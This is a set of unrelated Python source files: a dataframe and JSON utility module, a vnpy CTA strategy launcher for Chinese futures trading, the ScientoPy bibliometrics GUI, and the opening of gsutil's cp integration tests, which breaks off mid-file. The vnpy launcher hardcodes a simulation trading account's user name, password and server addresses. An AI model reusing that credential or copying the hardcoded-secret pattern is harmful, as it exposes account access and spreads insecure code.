'bz2': '.bz2',
'zip': '.zip',
'xz': '.xz',
}
def _infer_compression(filepath_or_buffer, compression):
"""
From Pandas.
Get the compression method for filepath_or_buffer. If compression='infer',
the inferred compression method is returned. Otherwise, the input
compression method is returned unchanged, unless it's invalid, in which
case an error is raised.
Parameters
----------
    filepath_or_buffer :
a path (str) or buffer
compression : str or None
the compression method including None for no compression and 'infer'
Returns
-------
string or None :
compression method
Raises
------
ValueError on invalid compression specified
"""
# No compression has been explicitly specified
if compression is None:
return None
if not is_str(filepath_or_buffer):
return None
# Infer compression from the filename/URL extension
if compression == 'infer':
for compression, extension in _compression_to_extension.items():
if filepath_or_buffer.endswith(extension):
return compression
return None
# Compression has been specified. Check that it's valid
if compression in _compression_to_extension:
return compression
msg = 'Unrecognized compression type: {}'.format(compression)
valid = ['infer', None] + sorted(_compression_to_extension)
msg += '\nValid compression types are {}'.format(valid)
raise ValueError(msg)
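# Examples: _infer_compression('data.csv.gz', 'infer') == 'gzip';
# _infer_compression('data.csv', 'infer') is None; passing a buffer instead of a
# path always yields None; _infer_compression('data.csv', 'zip') == 'zip', while
# an unknown method such as 'rar' raises ValueError.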
def get_physical_base(t):
# TODO: obsolete, to be removed
return t
def force_valid_id_columns(df):
uniq = set()
columns = []
i = 0
for c in df.columns:
i += 1
if not isinstance(c, str):
c = str(c)
c = fix_identifier(c)
while c in uniq:
c += ('_' + str(i))
columns.append(c)
df.columns = columns
class _Bag(object):
pass
class Dialog(object):
def __init__(self, module, started=False):
self._module = module
self.bag = _Bag()
self._started = started
def set_started(self, v=True):
self._started = v
return self
def set_output_table(self, res):
self._module.result = res
return self
@property
def is_started(self):
return self._started
@property
def output_table(self):
return self._module.result
def spy(*args, **kwargs):
import time
f = open(kwargs.pop('file'), "a")
print(time.time(), *args, file=f, flush=True, **kwargs)
f.close()
def patch_this(to_decorate, module, patch):
"""
patch decorator
"""
def patch_decorator(to_decorate):
"""
This is the actual decorator. It brings together the function to be
decorated and the decoration stuff
"""
@wraps(to_decorate)
def patch_wrapper(*args, **kwargs):
"""
This function is the decoration
run_step(self, run_number, step_size, howlong)
"""
patch.before_run_step(module, *args, **kwargs)
ret = to_decorate(*args, **kwargs)
patch.after_run_step(module, *args, **kwargs)
return ret
return patch_wrapper
return patch_decorator(to_decorate)
class ModulePatch(object):
def __init__(self, name):
self._name = name
self.applied = False
def patch_condition(self, m):
if self.applied:
return False
return self._name == m.name
def before_run_step(self, m, *args, **kwargs):
pass
def after_run_step(self, m, *args, **kwargs):
pass
def decorate_module(m, patch):
assert hasattr(m, 'run_step')
m.run_step = patch_this(to_decorate=m.run_step, module=m, patch=patch)
patch.applied = True
def decorate(scheduler, patch):
for m in scheduler.modules().values():
if patch.patch_condition(m):
decorate_module(m, patch)
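# Illustrative sketch: subclass ModulePatch to observe a module's run_step calls,
# then apply it to every matching module of a scheduler (all names below come
# from this file except TimingPatch and 'my_module', which are placeholders):
#
#     class TimingPatch(ModulePatch):
#         def before_run_step(self, m, *args, **kwargs):
#             print('entering', m.name)
#         def after_run_step(self, m, *args, **kwargs):
#             print('leaving', m.name)
#
#     decorate(scheduler, TimingPatch('my_module'))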
class JSONEncoderNp(js.JSONEncoder):
"Encode numpy objects"
def default(self, o):
"Handle default encoding."
if isinstance(o, float) and np.isnan(o):
return None
if isinstance(o, np.integer):
return int(o)
if isinstance(o, np.floating): # np.float32 don't inherit from float
return float(o)
if isinstance(o, np.bool_):
return bool(o)
if isinstance(o, np.ndarray):
return o.tolist()
if isinstance(o, bitmap):
return list(o)
return js.JSONEncoder.default(self, o)
@staticmethod
def dumps(*args, **kwargs):
return js.dumps(*args, cls=JSONEncoderNp, **kwargs)
@staticmethod
def loads(*args, **kwargs):
return js.loads(*args, **kwargs)
@staticmethod
def cleanup(*args, **kwargs):
s = JSONEncoderNp.dumps(*args, **kwargs)
return JSONEncoderNp.loads(s)
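# Examples: JSONEncoderNp.dumps({'a': np.int64(3)}) == '{"a": 3}' and
# JSONEncoderNp.dumps({'a': np.arange(3)}) == '{"a": [0, 1, 2]}'; plain json.dumps
# would raise TypeError on both values.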
async def asynchronize(f, *args, **kwargs):
# cf. https://docs.python.org/3/library/asyncio-eventloop.html#asyncio.loop.run_in_executor
loop = aio.get_running_loop()
fun = ft.partial(f, *args, **kwargs)
return await loop.run_in_executor(
None, fun)
def gather_and_run(*args):
"""
    this function avoids the use of the "%gui asyncio" magic in a notebook
"""
async def gath():
await aio.gather(*args)
def func_():
loop = aio.new_event_loop()
aio.set_event_loop(loop)
loop.run_until_complete(gath())
loop.close()
thread = threading.Thread(target=func_, args=())
thread.start()
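# Illustrative usage sketch (the coroutine names are placeholders): runs the
# awaitables on a private event loop in a background thread, so a notebook cell
# returns immediately and the "%gui asyncio" magic is not required:
#
#     gather_and_run(scheduler.start(), monitor())
#
# The background thread is not joined, so completion must be tracked separately.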
def is_notebook():
try:
from IPython import get_ipython
return get_ipython().__class__.__name__ == 'ZMQInteractiveShell'
    except (ImportError, AttributeError):  # no IPython, or get_ipython() returned None
pass
print("not in notebook")
return False
def filter_cols(df, columns=None, indices=None):
"""
Return the specified table filtered by the specified indices and
limited to the columns of interest.
"""
if columns is None:
if indices is None:
return df
return df.loc[indices]
cols = columns
if indices is None:
indices = slice(0, None)
return df.loc[indices, cols]
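# Examples (df is any pandas-like object exposing .loc): filter_cols(df) returns
# df unchanged; filter_cols(df, indices=[0, 2]) == df.loc[[0, 2]];
# filter_cols(df, columns=['a'], indices=[1, 3]) == df.loc[[1, 3], ['a']];
# with columns but no indices, a full slice(0, None) is used for the rows.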
|
run_cli.py
|
import multiprocessing
from time import sleep
from datetime import datetime, time
from logging import INFO
from vnpy.event import EventEngine
from vnpy.trader.setting import SETTINGS
from vnpy.trader.engine import MainEngine
from vnpy.gateway.ctp import CtpGateway
from vnpy.gateway.xtp import XtpGateway
from vnpy.app.cta_strategy import CtaStrategyApp
from vnpy.app.cta_strategy.base import EVENT_CTA_LOG
from vnpy.app.risk_manager import RiskManagerApp
import json
SETTINGS["log.active"] = True
SETTINGS["log.level"] = INFO
SETTINGS["log.console"] = True
# Domestic futures CTP SimNow (simulation) account settings.
# The Chinese keys below are the field names expected by the vnpy CTP gateway:
# 用户名 = user name, 密码 = password, 经纪商代码 = broker ID,
# 交易服务器 = trade server, 行情服务器 = market data server,
# 产品名称 = product name, 授权编码 = authorization code, 产品信息 = product info.
ctp_setting = {
"用户名": "53191002042",
"密码": "Sbiwh1Po",
"经纪商代码": 9999,
"交易服务器": "120.27.164.69:6001",
"行情服务器": "120.27.164.138:6002",
"产品名称": "simnow_client_test",
"授权编码": "0000000000000000",
"产品信息": ""
}
def run_child():
"""
Running in the child process.
"""
SETTINGS["log.file"] = True
event_engine = EventEngine()
main_engine = MainEngine(event_engine)
# main_engine.add_gateway(CtpGateway)
main_engine.add_gateway(XtpGateway, gateway_name='Xtp_test')
print(58, main_engine.gateways)
print(main_engine.get_all_gateway_names())
print(main_engine.get_all_gateway_status())
for gateway_name in main_engine.gateways:
xtp_setting = json.load(open(f"./connect_{gateway_name}.json", "r", encoding="utf8"))
main_engine.connect(xtp_setting, gateway_name)
sleep(2)
print(main_engine.get_all_gateway_status())
print(59)
cta_engine = main_engine.add_app(CtaStrategyApp)
main_engine.add_app(RiskManagerApp)
    main_engine.write_log("主引擎创建成功")  # "Main engine created successfully"
log_engine = main_engine.get_engine("log")
event_engine.register(EVENT_CTA_LOG, log_engine.process_log_event)
    main_engine.write_log("注册日志事件监听")  # "Registered log event listener"
# main_engine.connect(ctp_setting, "CTP")
    main_engine.write_log("连接CTP接口")  # "Connecting to the CTP interface"
sleep(10)
cta_engine.init_engine()
    main_engine.write_log("CTA策略初始化完成")  # "CTA engine initialization finished"
cta_engine.init_all_strategies()
sleep(60) # Leave enough time to complete strategy initialization
    main_engine.write_log("CTA策略全部初始化")  # "All CTA strategies initialized"
cta_engine.start_all_strategies()
    main_engine.write_log("CTA策略全部启动")  # "All CTA strategies started"
while True:
sleep(1)
def run_parent():
"""
Running in the parent process.
"""
    print("启动CTA策略守护父进程")  # "Starting the CTA strategy daemon parent process"
# Chinese futures market trading period (day/night)
DAY_START = time(8, 45)
DAY_END = time(15, 30)
NIGHT_START = time(20, 45)
NIGHT_END = time(2, 45)
child_process = None
while True:
current_time = datetime.now().time()
trading = False
# Check whether in trading period
if (
(current_time >= DAY_START and current_time <= DAY_END)
or (current_time >= NIGHT_START)
or (current_time <= NIGHT_END)
):
trading = True
# Start child process in trading period
if trading and child_process is None:
            print("启动子进程")  # "Starting child process"
child_process = multiprocessing.Process(target=run_child)
child_process.start()
            print("子进程启动成功")  # "Child process started successfully"
        # Exit the child process outside the trading (recording) period
if not trading and child_process is not None:
            print("关闭子进程")  # "Closing child process"
child_process.terminate()
child_process.join()
child_process = None
            print("子进程关闭成功")  # "Child process closed successfully"
sleep(5)
if __name__ == "__main__":
run_parent()
|
ScientoPyGui.py
|
# !/usr/bin/python3
# The MIT License (MIT)
# Copyright (c) 2018 - Universidad del Cauca, Juan Ruiz-Rosero
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from tkinter import *
from tkinter import filedialog
from tkinter import ttk
from tkinter import messagebox
from tkinter import font
from tkinter.ttk import Progressbar
import time
import threading
import tkinter.scrolledtext as scrolledtext
from PIL import ImageTk, ImageColor, Image
import globalVar
from PreProcessClass import PreProcessClass
from ScientoPyClass import ScientoPyClass
from generateBibtex import generateBibtex
import webbrowser
import os.path
class ScientoPyGui:
cb_square_color = 'white'
def __init__(self):
self.scientoPy = ScientoPyClass(from_gui=True)
self.preprocess = PreProcessClass(from_gui=True)
self.root = Tk()
self.root.geometry("853x480")
self.root.resizable(width=False, height=False)
try:
bg_color = self.root.cget('bg')
bg_color_rgb = ImageColor.getcolor(bg_color, "RGB")
bg_color_avg = sum(bg_color_rgb)/len(bg_color_rgb)
if(bg_color_avg < 75):
self.cb_square_color = bg_color
except:
pass
default_font = font.nametofont("TkDefaultFont")
default_font.configure(size=10)
self.root.option_add("*font", default_font)
if os.path.exists('scientopy_icon.png'):
self.root.iconphoto(True, PhotoImage(file="scientopy_icon.png"))
self.root.title("ScientoPy")
# Starting the tabs
self.nb = ttk.Notebook(self.root)
preprocess_page = Frame(self.nb)
process_page = Frame(self.nb)
self.nb.add(preprocess_page, text='1. Pre-processing')
self.nb.add(process_page, text='2. Analysis')
self.nb.pack(expand=1, fill="both")
self.nb.select(preprocess_page)
# Pre processing tab *******************************
if os.path.exists('scientopy_logo.png'):
load = Image.open("scientopy_logo.png")
render = ImageTk.PhotoImage(load)
img = Label(preprocess_page, image=render)
img.image = render
img.place(relx=0.5, rely=0.35, anchor=CENTER)
version_label = Label(preprocess_page, text=("Universidad del Cauca, Popayán, Colombia"
"\nMIT License \nVersion %s" % globalVar.SCIENTOPY_VERSION))
version_label.place(relx=0.5, rely=0.7, anchor=CENTER)
Label(preprocess_page, text="Dataset folder:").grid(column=0, row=0, padx=17)
preprocess_page.grid_rowconfigure(0, pad=700)
self.datasetLoc = StringVar()
preprocess_page.grid_columnconfigure(2, weight=1)
self.datasetLocEntry = Entry(preprocess_page, textvariable=self.datasetLoc)
# self.datasetLocEntry.place(relx=0.47, rely=0.8, anchor=CENTER)
self.datasetLocEntry.grid(column=1, row=0, columnspan=2, sticky='we')
dataset_button = Button(preprocess_page, text="Select dataset", command=self.select_dataset)
# dataset_button.place(relx=0.9, rely=0.8, anchor=CENTER)
dataset_button.grid(column=3, row=0, sticky='w', padx=17)
self.chkValueRemoveDupl = BooleanVar()
self.chkValueRemoveDupl.set(True)
Checkbutton(preprocess_page, var=self.chkValueRemoveDupl,
text="Remove duplicated documents",
selectcolor=self.cb_square_color).place(relx=0.015, rely=0.9, anchor=W)
# Buttons ****************************
run_preprocess_button = Button(preprocess_page, text="Run preprocess", command=self.run_preprocess)
run_preprocess_button.place(relx=0.9, rely=0.9, anchor=CENTER)
open_preprocess_brief = Button(preprocess_page, text="Open preprocess brief",
command=self.open_preprocess_brief)
open_preprocess_brief.place(relx=0.57, rely=0.9, anchor=W)
# Analysis tab ************************************************************
Label(process_page, text="").grid(sticky=W, column=0, row=0)
Label(process_page, text="Criterion:", borderwidth=10).grid(sticky=W, column=0, row=1)
self.comboCriterion = ttk.Combobox(process_page, values=globalVar.validCriterion, width=15)
self.comboCriterion.current(3)
self.comboCriterion.grid(column=1, row=1)
Label(process_page, text="Graph type:", borderwidth=10).grid(sticky=W, column=0, row=2)
self.comboGraphType = ttk.Combobox(process_page, values=globalVar.validGrapTypes, width=15)
self.comboGraphType.current(0)
self.comboGraphType.grid(column=1, row=2)
Label(process_page, text="Start Year:", borderwidth=10).grid(sticky=W, column=0, row=3)
self.spinStartYear = Spinbox(process_page, from_=1900, to=2100,
textvariable=DoubleVar(value=globalVar.DEFAULT_START_YEAR), width=15)
self.spinStartYear.grid(column=1, row=3)
Label(process_page, text="End Year:", borderwidth=10).grid(sticky=W, column=0, row=4)
self.spinEndYear = Spinbox(process_page, from_=1900, to=2100,
textvariable=DoubleVar(value=globalVar.DEFAULT_END_YEAR), width=15)
self.spinEndYear.grid(column=1, row=4)
Label(process_page, text="Topics length:", borderwidth=10).grid(sticky=W, column=0, row=5)
self.spinTopicsLength = Spinbox(process_page, from_=0, to=1000, textvariable=DoubleVar(value=10),
width=15)
self.spinTopicsLength.grid(column=1, row=5)
Label(process_page, text="Skip first:", borderwidth=10).grid(sticky=W, column=0, row=6)
self.spinSkipFirst = Spinbox(process_page, from_=0, to=1000, textvariable=DoubleVar(value=0),
width=15)
self.spinSkipFirst.grid(column=1, row=6)
Label(process_page, text="Window (years):", borderwidth=10).grid(sticky=W, column=0, row=7)
self.spinWindowWidth = Spinbox(process_page, from_=1, to=100, textvariable=DoubleVar(value=2),
width=15)
self.spinWindowWidth.grid(column=1, row=7)
self.chkValuePreviusResults = BooleanVar()
self.chkValuePreviusResults.set(False)
Checkbutton(process_page, var=self.chkValuePreviusResults, selectcolor=self.cb_square_color,
text="Use previous results").grid(sticky=W, column=0, row=8, padx=7)
self.chkValueTrendAnalysis = BooleanVar()
self.chkValueTrendAnalysis.set(False)
Checkbutton(process_page, var=self.chkValueTrendAnalysis, selectcolor=self.cb_square_color,
text="Trend analysis").grid(sticky=W, column=0, row=9, padx=7)
process_page.grid_columnconfigure(2, weight=1)
Label(process_page, text="Custom topics:", borderwidth=10).grid(sticky=W, column=2, row=1, padx=15)
self.entryCustomTopics = scrolledtext.ScrolledText(process_page, undo=True, height=18)
self.entryCustomTopics.grid(column=2, row=2, rowspan=9, sticky=E, padx=25)
# Buttons ****************************
results_button = Button(process_page, text="Open results table", command=self.open_results)
results_button.place(relx=0.008, rely=0.92, anchor=W)
ext_results_button = Button(process_page, text="Open extended results", command=self.open_ext_results)
ext_results_button.place(relx=0.20, rely=0.92, anchor=W)
genbibtex_button = Button(process_page, text="Generate BibTeX", command=self.generate_bibtex)
genbibtex_button.place(relx=0.45, rely=0.92, anchor=W)
run_button = Button(process_page, text="Run", command=self.scientoPyRun)
run_button.place(relx=0.96, rely=0.92, anchor=E)
def cancel_run(self):
globalVar.cancelProcess = True
print("Canceled")
def progress_bar_fun(self):
def on_closing():
self.cancel_run()
#start progress bar
popup = Toplevel()
popup.protocol("WM_DELETE_WINDOW", on_closing)
x = self.root.winfo_x()
y = self.root.winfo_y()
popup.geometry('300x120+%d+%d' % (x + 250, y + 120))
popup.title("Progress")
label_text = StringVar()
label = Label(popup, textvariable=label_text)
label.place(x=150, y=20, anchor="center")
label_text.set(globalVar.progressText)
progress_var = DoubleVar()
progress_bar = ttk.Progressbar(popup, variable=progress_var, maximum=100, length = 280)
progress_bar.place(x=150, y=50, anchor="center")
popup.pack_slaves()
cancel_button = Button(popup, text="Cancel", command=self.cancel_run)
cancel_button.place(x=150, y=95, anchor="center")
#print("globalVar.progressPer1: %d" % globalVar.progressPer)
while globalVar.progressPer != 101:
label_text.set(globalVar.progressText)
popup.update()
time.sleep(0.1)
#print("globalVar.progressPer2: %d" % globalVar.progressPer)
progress_var.set(globalVar.progressPer)
if globalVar.cancelProcess:
break
popup.destroy()
return 0
def open_results(self):
if os.path.exists(self.scientoPy.resultsFileName):
webbrowser.open(self.scientoPy.resultsFileName)
else:
messagebox.showinfo("Error", "No results found, please run the analysis first")
def open_ext_results(self):
if os.path.exists(self.scientoPy.extResultsFileName):
webbrowser.open(self.scientoPy.extResultsFileName)
else:
messagebox.showinfo("Error", "No extended results found, please run the analysis first")
def open_preprocess_brief(self):
if os.path.exists(self.scientoPy.preprocessBriefFileName):
webbrowser.open(self.scientoPy.preprocessBriefFileName)
else:
            messagebox.showinfo("Error", "No preprocess brief found, please run the preprocess first")
def scientoPyRun(self):
globalVar.cancelProcess = False
globalVar.progressPer = 0
if not os.path.exists(self.scientoPy.preprocessDatasetFile):
messagebox.showinfo("Error", "No preprocess input dataset, please run the preprocess first")
return
print(self.chkValuePreviusResults.get())
self.scientoPy.closePlot()
self.scientoPy.criterion = self.comboCriterion.get()
self.scientoPy.graphType = self.comboGraphType.get()
self.scientoPy.startYear = int(self.spinStartYear.get())
self.scientoPy.endYear = int(self.spinEndYear.get())
self.scientoPy.length = int(self.spinTopicsLength.get())
self.scientoPy.skipFirst = int(self.spinSkipFirst.get())
self.scientoPy.windowWidth = int(self.spinWindowWidth.get())
self.scientoPy.previousResults = self.chkValuePreviusResults.get()
self.scientoPy.trend = self.chkValueTrendAnalysis.get()
if bool(self.entryCustomTopics.get("1.0", END).strip()):
self.scientoPy.topics = self.entryCustomTopics.get("1.0", END).replace("\n", ";")
else:
self.scientoPy.topics = ''
t1 = threading.Thread(target=self.scientoPy.scientoPy)
t1.start()
self.progress_bar_fun()
t1.join()
if globalVar.cancelProcess:
return
self.scientoPy.plotResults()
def select_dataset(self):
self.root.dir_name = filedialog.askdirectory()
if not self.root.dir_name:
return
self.datasetLoc.set(self.root.dir_name)
def run_preprocess(self):
print(self.datasetLoc.get())
if self.datasetLoc.get():
try:
                self.preprocess.dataInFolder = self.datasetLoc.get()
self.preprocess.noRemDupl = not self.chkValueRemoveDupl.get()
# Run preprocess in another thread
t1 = threading.Thread(target=self.preprocess.preprocess)
t1.start()
# While running preprocess run progress bar
# Progress bar ends when preprocess ends
self.progress_bar_fun()
# Wait until preprocess thread ends
t1.join()
if globalVar.cancelProcess:
messagebox.showinfo("Error", "Preprocessing canceled")
elif(globalVar.totalPapers > 0):
self.preprocess.graphBrief()
elif globalVar.totalPapers == 0:
                    messagebox.showinfo("Error", "No valid dataset files found in: %s" % self.datasetLoc.get())
except:
messagebox.showinfo("Error", "No valid dataset folder")
else:
messagebox.showinfo("Error", "No dataset folder defined")
def generate_bibtex(self):
if not os.path.exists(self.scientoPy.preprocessDatasetFile):
messagebox.showinfo("Error", "No preprocess input dataset, please run the preprocess first")
return
latexFileName = filedialog.askopenfilename(initialdir="./", title="Select the LaTeX file",
filetypes=(("Latex", "*.tex"), ("all files", "*.*")))
if not latexFileName:
return
print(latexFileName)
outFileName = generateBibtex(latexFileName)
webbrowser.open(outFileName)
def runGui(self):
self.root.mainloop()
if __name__ == '__main__':
scientoPyGui = ScientoPyGui()
scientoPyGui.runGui()
|
test_cp.py
|
# -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration tests for cp command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import ast
import base64
import binascii
import datetime
import gzip
import logging
import os
import pickle
import pkgutil
import random
import re
import stat
import string
import sys
import threading
from unittest import mock
from apitools.base.py import exceptions as apitools_exceptions
import boto
from boto import storage_uri
from boto.exception import ResumableTransferDisposition
from boto.exception import StorageResponseError
from boto.storage_uri import BucketStorageUri
from gslib import exception
from gslib import name_expansion
from gslib.cloud_api import ResumableUploadStartOverException
from gslib.commands.config import DEFAULT_SLICED_OBJECT_DOWNLOAD_THRESHOLD
from gslib.cs_api_map import ApiSelector
from gslib.daisy_chain_wrapper import _DEFAULT_DOWNLOAD_CHUNK_SIZE
from gslib.discard_messages_queue import DiscardMessagesQueue
from gslib.exception import InvalidUrlError
from gslib.gcs_json_api import GcsJsonApi
from gslib.parallel_tracker_file import ObjectFromTracker
from gslib.parallel_tracker_file import WriteParallelUploadTrackerFile
from gslib.project_id import PopulateProjectId
from gslib.storage_url import StorageUrlFromString
from gslib.tests.rewrite_helper import EnsureRewriteResumeCallbackHandler
from gslib.tests.rewrite_helper import HaltingRewriteCallbackHandler
from gslib.tests.rewrite_helper import RewriteHaltException
import gslib.tests.testcase as testcase
from gslib.tests.testcase.base import NotParallelizable
from gslib.tests.testcase.integration_testcase import SkipForGS
from gslib.tests.testcase.integration_testcase import SkipForS3
from gslib.tests.testcase.integration_testcase import SkipForXML
from gslib.tests.testcase.integration_testcase import SkipForJSON
from gslib.tests.util import BuildErrorRegex
from gslib.tests.util import GenerationFromURI as urigen
from gslib.tests.util import HaltingCopyCallbackHandler
from gslib.tests.util import HaltOneComponentCopyCallbackHandler
from gslib.tests.util import HAS_GS_PORT
from gslib.tests.util import HAS_S3_CREDS
from gslib.tests.util import ObjectToURI as suri
from gslib.tests.util import ORPHANED_FILE
from gslib.tests.util import POSIX_GID_ERROR
from gslib.tests.util import POSIX_INSUFFICIENT_ACCESS_ERROR
from gslib.tests.util import POSIX_MODE_ERROR
from gslib.tests.util import POSIX_UID_ERROR
from gslib.tests.util import SequentialAndParallelTransfer
from gslib.tests.util import SetBotoConfigForTest
from gslib.tests.util import SetEnvironmentForTest
from gslib.tests.util import TailSet
from gslib.tests.util import TEST_ENCRYPTION_KEY1
from gslib.tests.util import TEST_ENCRYPTION_KEY1_SHA256_B64
from gslib.tests.util import TEST_ENCRYPTION_KEY2
from gslib.tests.util import TEST_ENCRYPTION_KEY3
from gslib.tests.util import unittest
from gslib.third_party.storage_apitools import storage_v1_messages as apitools_messages
from gslib.tracker_file import DeleteTrackerFile
from gslib.tracker_file import GetRewriteTrackerFilePath
from gslib.tracker_file import GetSlicedDownloadTrackerFilePaths
from gslib.ui_controller import BytesToFixedWidthString
from gslib.utils import hashing_helper
from gslib.utils.boto_util import UsingCrcmodExtension
from gslib.utils.constants import START_CALLBACK_PER_BYTES
from gslib.utils.constants import UTF8
from gslib.utils.copy_helper import GetTrackerFilePath
from gslib.utils.copy_helper import PARALLEL_UPLOAD_STATIC_SALT
from gslib.utils.copy_helper import PARALLEL_UPLOAD_TEMP_NAMESPACE
from gslib.utils.copy_helper import TrackerFileType
from gslib.utils.hashing_helper import CalculateB64EncodedMd5FromContents
from gslib.utils.hashing_helper import CalculateMd5FromContents
from gslib.utils.hashing_helper import GetMd5
from gslib.utils.metadata_util import CreateCustomMetadata
from gslib.utils.posix_util import GID_ATTR
from gslib.utils.posix_util import MODE_ATTR
from gslib.utils.posix_util import NA_ID
from gslib.utils.posix_util import NA_MODE
from gslib.utils.posix_util import UID_ATTR
from gslib.utils.posix_util import ParseAndSetPOSIXAttributes
from gslib.utils.posix_util import ValidateFilePermissionAccess
from gslib.utils.posix_util import ValidatePOSIXMode
from gslib.utils.retry_util import Retry
from gslib.utils.system_util import IS_WINDOWS
from gslib.utils.text_util import get_random_ascii_chars
from gslib.utils.unit_util import EIGHT_MIB
from gslib.utils.unit_util import HumanReadableToBytes
from gslib.utils.unit_util import MakeHumanReadable
from gslib.utils.unit_util import ONE_KIB
from gslib.utils.unit_util import ONE_MIB
import six
from six.moves import http_client
from six.moves import range
from six.moves import xrange
if six.PY3:
long = int # pylint: disable=redefined-builtin,invalid-name
# These POSIX-specific variables aren't defined for Windows.
# pylint: disable=g-import-not-at-top
if not IS_WINDOWS:
from gslib.tests import util
from gslib.tests.util import DEFAULT_MODE
from gslib.tests.util import GetInvalidGid
from gslib.tests.util import GetNonPrimaryGid
from gslib.tests.util import GetPrimaryGid
from gslib.tests.util import INVALID_UID
from gslib.tests.util import USER_ID
# pylint: enable=g-import-not-at-top
def TestCpMvPOSIXBucketToLocalErrors(cls, bucket_uri, obj, tmpdir, is_cp=True):
"""Helper function for preserve_posix_errors tests in test_cp and test_mv.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket that the object is in.
obj: The object to run the tests on.
tmpdir: The local file path to cp to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
error = 'error'
# A dict of test_name: attrs_dict.
# attrs_dict holds the different attributes that we want for the object in a
# specific test.
# To minimize potential test flakes from the system's GID mapping changing
# mid-test, we use the GID-related methods that fetch GID info each time,
# rather than reusing the LazyWrapper-wrapped constants across operations.
test_params = {
'test1': {
MODE_ATTR: '333',
error: POSIX_MODE_ERROR
},
'test2': {
GID_ATTR: GetInvalidGid,
error: POSIX_GID_ERROR
},
'test3': {
GID_ATTR: GetInvalidGid,
MODE_ATTR: '420',
error: POSIX_GID_ERROR
},
'test4': {
UID_ATTR: INVALID_UID,
error: POSIX_UID_ERROR
},
'test5': {
UID_ATTR: INVALID_UID,
MODE_ATTR: '530',
error: POSIX_UID_ERROR
},
'test6': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetInvalidGid,
error: POSIX_UID_ERROR
},
'test7': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetInvalidGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test8': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetPrimaryGid,
error: POSIX_UID_ERROR
},
'test9': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetNonPrimaryGid,
error: POSIX_UID_ERROR
},
'test10': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetPrimaryGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test11': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetNonPrimaryGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test12': {
UID_ATTR: USER_ID,
GID_ATTR: GetInvalidGid,
error: POSIX_GID_ERROR
},
'test13': {
UID_ATTR: USER_ID,
GID_ATTR: GetInvalidGid,
MODE_ATTR: '640',
error: POSIX_GID_ERROR
},
'test14': {
GID_ATTR: GetPrimaryGid,
MODE_ATTR: '240',
error: POSIX_INSUFFICIENT_ACCESS_ERROR
}
}
# The first variable below can be used to help debug the test if there is a
# problem.
for test_name, attrs_dict in six.iteritems(test_params):
cls.ClearPOSIXMetadata(obj)
# Attributes default to None if they are not in attrs_dict; some attrs are
# functions or LazyWrapper objects that should be called.
uid = attrs_dict.get(UID_ATTR)
if uid is not None and callable(uid):
uid = uid()
gid = attrs_dict.get(GID_ATTR)
if gid is not None and callable(gid):
gid = gid()
mode = attrs_dict.get(MODE_ATTR)
cls.SetPOSIXMetadata(cls.default_provider,
bucket_uri.bucket_name,
obj.object_name,
uid=uid,
gid=gid,
mode=mode)
stderr = cls.RunGsUtil([
'cp' if is_cp else 'mv', '-P',
suri(bucket_uri, obj.object_name), tmpdir
],
expected_status=1,
return_stderr=True)
cls.assertIn(
ORPHANED_FILE, stderr,
'Error during test "%s": %s not found in stderr:\n%s' %
(test_name, ORPHANED_FILE, stderr))
error_regex = BuildErrorRegex(obj, attrs_dict.get(error))
cls.assertTrue(
error_regex.search(stderr),
'Test %s did not match expected error; could not find a match for '
'%s\n\nin stderr:\n%s' % (test_name, error_regex.pattern, stderr))
listing1 = TailSet(suri(bucket_uri), cls.FlatListBucket(bucket_uri))
listing2 = TailSet(tmpdir, cls.FlatListDir(tmpdir))
# Bucket should have un-altered content.
    cls.assertEqual(listing1, set(['/%s' % obj.object_name]))
# Dir should have un-altered content.
    cls.assertEqual(listing2, set(['']))
def TestCpMvPOSIXBucketToLocalNoErrors(cls, bucket_uri, tmpdir, is_cp=True):
"""Helper function for preserve_posix_no_errors tests in test_cp and test_mv.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket that the object is in.
tmpdir: The local file path to cp to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
primary_gid = os.stat(tmpdir).st_gid
non_primary_gid = util.GetNonPrimaryGid()
test_params = {
'obj1': {
GID_ATTR: primary_gid
},
'obj2': {
GID_ATTR: non_primary_gid
},
'obj3': {
GID_ATTR: primary_gid,
MODE_ATTR: '440'
},
'obj4': {
GID_ATTR: non_primary_gid,
MODE_ATTR: '444'
},
'obj5': {
UID_ATTR: USER_ID
},
'obj6': {
UID_ATTR: USER_ID,
MODE_ATTR: '420'
},
'obj7': {
UID_ATTR: USER_ID,
